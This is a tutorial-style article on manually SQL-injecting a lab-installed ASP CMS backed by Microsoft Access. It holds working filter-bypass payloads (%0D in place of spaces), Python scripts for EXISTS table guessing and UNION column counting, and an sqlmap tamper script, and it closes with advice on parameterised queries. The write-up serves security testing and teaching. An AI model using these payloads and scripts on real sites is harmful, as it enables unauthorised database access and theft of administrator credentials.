2025-01-16 Update From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
This article walks through a manual SQL injection against a CMS backed by a Microsoft Access database, using Burp Suite to do the repetitive parts. Let's take a look.
Environment introduction
The target is a CMS picked up from the Internet, installed on a local Windows Server virtual machine with IIS enabled. Because it uses an Access database, no database service needs to be installed: the database is the data.mdb file in the /data folder under the web root.
Discover the injection point
Browsing the site in the test environment shows that this CMS reads a news item through a URL of the form http://172.22.10.239/info.asp?id=240. Out of habit, a single quote was appended to id, and unexpectedly the server returned an HTTP 500 error!
To confirm, and considering that id here should be the row number in the database, the underlying query is probably of the form:
SELECT {col_name} FROM {table_name} WHERE `id` = {id}
with id spliced directly into the statement. To test this guess, construct the payload:
?id=240+and+1=1+
In a URL the + sign is equivalent to a space; it is used here instead of %20 to avoid problems.
This still returns 500. Was the guess wrong, or is there something else appended after the statement? Not giving up, try or instead:
?id=240+or+1=1+
Now the page displays normally. It is almost certain that there is an injection point here, and very likely the word and is being replaced.
Analysis of problems
With the injection point found, injection can be attempted. The normal approach is to probe the filtering rules by trial and error, but because the target is a CMS whose source code we have, we go straight to the source of the relevant pages to see which rules it uses to intercept input.
Open info.asp first and find where the id parameter is handled. Line 4 is a naked SQL concatenation, and the statement is exactly what we guessed:
What is rqs() here? Its definition is found in library.asp:
Str_safe function definition:
At this point all the rules are clear: the '{space}and' we entered is on the filter list. The next step is how to bypass it and inject.
Try to inject
The main difference between injecting into Access and into MySQL is that Access has no equivalent of information_schema, so table names cannot be read out through the injection and have to be guessed. (Access does keep a hidden MSysObjects system table, but Jet normally denies read permission on it, so it is no help through an injection point.)
Bypass filtering
Before guessing, the filter has to be bypassed. Having read the source and understood how the filtering works, every string the CMS replaces contains a space, such as '{space}and' and 'select{space}', so the task is to find a substitute for the space.
The first idea is to vary the case, for example AnD, but the Replace calls end with the arguments 1, -1, 1. These are the start position, the number of replacements to make (-1 means all occurrences) and the comparison mode; the comparison mode defaults to 0 (binary, case-sensitive) and when set to 1 it is case-insensitive, so case variation has no effect.
Next, try other characters in place of the space. Apart from %20 and +, there are characters that Access also treats as whitespace, and Burp Suite's Intruder is the tool for enumerating them.
In the Positions tab, mark the characters to be substituted: following the rules in the source code, replace every space the filter depends on, writing each as the URL escape %xx and marking everything except the '%'. Choose the Battering ram attack type so that all marked positions receive the same payload at the same time:
In the Payloads tab, choose the Brute forcer payload type, fill in the hex character set (0-9, a-f) and set both minimum and maximum length to 2, which enumerates every byte from 0x00 to 0xFF.
The attack finishes almost instantly. Sort the results by the response Status; the entries with 200 returned the normal page, which gives a preliminary set of characters that let the query run.
The boxed entries are that preliminary set. A successful run does not yet prove the character acted as a space; it may have had some other effect (such as truncating the statement), so run the surviving characters again with id=240%{xx}and%{xx}1=2. As there are only a few, test these payloads with the Simple list payload type:
In this result, a status of 500 means the character was parsed as a space (a false 'and 1=2' condition was injected, so no row and an error are expected). Among the results that still return 200, two characters act as truncation: whatever follows them is no longer parsed as part of the SQL statement.
So the characters currently usable in place of a space are %09, %0A and %0D (tab, line feed and carriage return).
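As an added illustration, not code from the article or from the CMS, the following Python models the Replace-based filter the source review found and the two-stage Intruder search just described. The filter list is an assumption: only the two rules the text names are included, the real Str_safe list being longer. The stage-1 probe is assumed to be the true condition id=240%xxand%xx1=1 and stage 2 the false condition id=240%xxand%xx1=2 from the text; the response statuses handed to classify() are whatever the tester observed in Intruder, nothing is fetched here.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed model of the CMS filter: only the two rules the article names are
# listed; the real Str_safe list in library.asp is longer.
FILTER_RULES = (" and", "select ")


def str_safe(value: str) -> str:
    """Emulate Replace(value, rule, "", 1, -1, 1) for every rule: all
    occurrences removed, case-insensitively (compare = 1, vbTextCompare)."""
    for rule in FILTER_RULES:
        value = re.sub(re.escape(rule), "", value, flags=re.IGNORECASE)
    return value


def probe_strings(encoded_sep: str, row_id: str = "240"):
    """The two Intruder probes for one candidate separator, as info.asp sees
    them after URL decoding and filtering: a true condition (stage 1) and a
    false one (stage 2)."""
    sep = unquote_to_bytes(encoded_sep).decode("latin-1")
    return (str_safe(f"{row_id}{sep}and{sep}1=1"),
            str_safe(f"{row_id}{sep}and{sep}1=2"))


def keyword_survives(encoded_sep: str) -> bool:
    """True when 'and' still reaches the SQL engine, i.e. the '{space}and'
    rule did not match because the separator is not a literal space."""
    return "and" in probe_strings(encoded_sep)[0].lower()


def candidate_separators():
    """Stage-1 payload set: every byte 0x00-0xFF URL-encoded, which is what
    the Brute forcer payload with the hex charset and length 2 enumerates."""
    return [f"%{b:02X}" for b in range(256)]


def classify(results):
    """results: {encoded_sep: (status on 'and 1=1', status on 'and 1=2')}.
    A byte Access treats as whitespace gives 200 then 500 (the false condition
    selects no row); a byte that truncates the statement gives 200 twice;
    anything else breaks the syntax and errors on both."""
    spaces, truncators = [], []
    for sep, (status_true, status_false) in results.items():
        if status_true != 200:
            continue
        (spaces if status_false == 500 else truncators).append(sep)
    return spaces, truncators
```

The decisive point is that the filter operates on the decoded parameter and looks for a literal space: a tab, line feed or carriage return passes it untouched and yet is whitespace to Jet, which is exactly what the two Intruder runs separate from bytes that merely cut the statement short.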
Guess the table name
Knowing the filtering rules and having found substitute characters, we can try to guess table names.
Access has no system table listing the data tables that can be read through an injection point, so unlike MySQL the names cannot be read out directly; the only way is to brute-force them.
First build the payload. Based on the previous step, replace the condition after the AND keyword with an expression that tests whether a table exists; the EXISTS keyword does this:
EXISTS (SELECT NULL FROM `{Table name}`)
If the table does not exist the query errors and the page returns 500; if it exists, EXISTS returns True and the page naturally returns 200.
For the guesses themselves there are Top-100-style table name lists to download, or one can guess blindly. Most systems have a table whose name contains admin, differing at most by a prefix: domestic CMSes like to prepend the CMS's abbreviation or a single letter, as in t_admin. Build a guess list for the target along these lines, import it into Intruder as a Simple list and brute-force it.
For this CMS, since the source code is available locally, we cheated and read the table names straight out of it: the administrator table, for example, is called CMS_ADMIN.
Carry out injection
Everything is ready; all that remains is the injection itself. Here the UNION keyword is used to read the data we want. Using UNION requires knowing the number of columns in the original query; otherwise the column counts mismatch and 500 is returned. The complete SQL query we expect to build is:
SELECT * FROM `cms_info` WHERE id = 1 UNION SELECT 1 FROM cms_info
Now the number of 1s the UNION needs has to be found. Use Intruder again, starting from the payload id=1%0Dunion%0Dselect%0D1%0Dfrom%0Dcms_info with %0D standing in for the spaces. After inserting the marker it looks like this:
Choose the Character blocks payload type, set Min length to 2 (the length of one '1,' block) and, to try 1 to 50 columns, set Max length to 50 * 2 = 100:
Sort the results by Status; the first 200 response is result number 34, so the table queried by the news page has 35 columns in total (the payload already begins with UNION SELECT 1 FROM ..., so add 1).
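The two Intruder runs above (EXISTS table guessing and UNION column counting) can also be scripted. The Python below is an added example, not the article's own tooling: it builds the same payloads with %0D in place of every space and takes a fetch(url) callable returning the HTTP status, so the decision rules (200 means the table exists or the column count matches, 500 means an error) are separated from the transport. The http_status() helper is a plain urllib fetch for the lab URL the article uses; constructed_oracle() is a constructed stand-in that mirrors the article's findings so the script runs offline. The prefixes in expand_wordlist() are the article's own suggestions, not a tested list.

```python
from typing import Callable, Iterable, List, Optional
import urllib.error
import urllib.request

BASE = "http://172.22.10.239/info.asp"   # the target URL from the article
SPACE = "%0D"                            # carriage return in place of every space


def sp(sql: str) -> str:
    """URL-encode a SQL fragment with %0D for each space, so neither
    '{space}and' nor 'select{space}' ever appears in the decoded query."""
    return sql.replace(" ", SPACE)


def table_probe_url(table: str, row_id: int = 240) -> str:
    """id=240 and exists(select null from <table>): the page comes back (200)
    when the table exists and errors (500) when it does not."""
    return f"{BASE}?id={row_id}{sp(f' and exists(select null from {table})')}"


def expand_wordlist(words: Iterable[str], prefixes=("", "t_", "cms_")) -> List[str]:
    """Prefixed variants of a base list, as the article suggests for CMS tables."""
    return [p + w for w in words for p in prefixes]


def guess_tables(candidates: Iterable[str], fetch: Callable[[str], int]) -> List[str]:
    """Boolean-blind table guessing. fetch(url) returns the HTTP status code."""
    return [t for t in candidates if fetch(table_probe_url(t)) == 200]


def union_probe_url(table: str, ncols: int, row_id: int = 240) -> str:
    """id=240 union select 1,...,1 from <table> with ncols ones: the same
    payloads the Character blocks run generated."""
    cols = ",".join(["1"] * ncols)
    return f"{BASE}?id={row_id}{sp(f' union select {cols} from {table}')}"


def count_columns(table: str, fetch: Callable[[str], int], max_cols: int = 50) -> Optional[int]:
    """Smallest column count for which the UNION stops erroring, or None."""
    for n in range(1, max_cols + 1):
        if fetch(union_probe_url(table, n)) == 200:
            return n
    return None


def http_status(url: str) -> int:
    """Real fetch for the lab target: returns the status code, including the
    500 that urllib otherwise raises as an exception."""
    try:
        return urllib.request.urlopen(url, timeout=5).status
    except urllib.error.HTTPError as e:
        return e.code


def constructed_oracle(url: str) -> int:
    """Constructed stand-in for the server, mirroring the article's findings
    (cms_admin exists, cms_info has 35 columns) so the script runs offline."""
    if "exists(" in url:
        return 200 if url.endswith("from%0Dcms_admin)") else 500
    if "union" in url:
        cols = url.split("select%0D")[1].split("%0Dfrom")[0]
        return 200 if cols.count("1") == 35 else 500
    return 200


if __name__ == "__main__":
    # Swap constructed_oracle for http_status to run against the lab target.
    print(guess_tables(expand_wordlist(["admin", "user", "news"]), constructed_oracle))
    print(count_columns("cms_info", constructed_oracle))
```

Keeping the oracle as a parameter is deliberate: the same two functions work against Intruder's exported results, a requests session with cookies, or a fake during development, and the 200/500 rule stays in one place where it can be changed if the application starts answering errors with a redirect instead of a 500.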
Although the status is 200, the page does not show normal data; resending the request in Repeater shows that it redirects to login.asp:
So one of the returned fields controls how the page is displayed, and each field's role has to be worked out by changing its value; here three different values, 0, 1 and NULL, are tried. The detailed analysis is omitted. Finally the injection yields the result, such as the administrator account and password:
Summary and analysis
Because this injection point replaces certain strings and some of the main SQL keywords are escaped, sqlmap cannot dump the data directly, which is why the injection was done by hand. In fact it could also be automated by giving sqlmap a tamper script that replaces every space with %0D, so that it runs the enumeration itself (not tried, but feasible in principle).
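Such a tamper script is short. The one below is an added example written for this page, not a script shipped with sqlmap or tried against the article's target; the file name space2cr is an assumption. It follows the layout of sqlmap's own tamper scripts (a __priority__ value, dependencies() and tamper()) and, unlike a blind replace(), leaves spaces inside quoted string literals alone so that string comparisons in sqlmap's payloads still work.

```python
#!/usr/bin/env python
"""
space2cr.py (assumed name): replace every space outside quoted strings with %0D.
Copy into sqlmap's tamper/ directory and select it with --tamper=space2cr.
"""
try:
    from lib.core.enums import PRIORITY   # only importable inside sqlmap
    __priority__ = PRIORITY.LOW
except ImportError:                       # lets the file import stand-alone
    __priority__ = 0

CR = "%0D"   # carriage return: whitespace to Jet, invisible to the '{space}and' filter


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Replaces spaces outside single or double quotes with %0D so that the
    '{space}and' and 'select{space}' replacement rules never match.

    >>> tamper('1 AND 1=1')
    '1%0DAND%0D1=1'
    >>> tamper("1 AND 'a b'='a b'")
    "1%0DAND%0D'a b'='a b'"
    """
    if not payload:
        return payload
    out = []
    quote = None                 # the quote character currently open, if any
    for ch in payload:
        if quote is None and ch in ("'", '"'):
            quote = ch
        elif ch == quote:
            quote = None
        out.append(CR if ch == " " and quote is None else ch)
    return "".join(out)
```

sqlmap handles Access by brute-forcing names rather than reading a catalogue, so the run would combine the tamper script with its wordlist options, for instance sqlmap -u "http://172.22.10.239/info.asp?id=240" --dbms=access --tamper=space2cr --common-tables. The page reports this was not tried, and the command line here is likewise untested against that target.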
For an Access database, table and column names both have to be guessed blindly, which in general makes injection laborious; but for a CMS the table and field names are public and ordinary deployments rarely rename them, so once an injection point appears the exposure is serious.
As SQL injection prevention, this kind of string replacement is clearly inadequate; there are many ways around 'keyword + space' matching. If stricter matching is feared to affect the business, at least restrict the allowed type and length of each variable locally (here id should only ever be an integer, which already defeats every payload in this article) and, better, pass it to the query as a parameter rather than by concatenation, to reduce the SQLi exposure.
© 2024 shulou.com SLNews company. All rights reserved.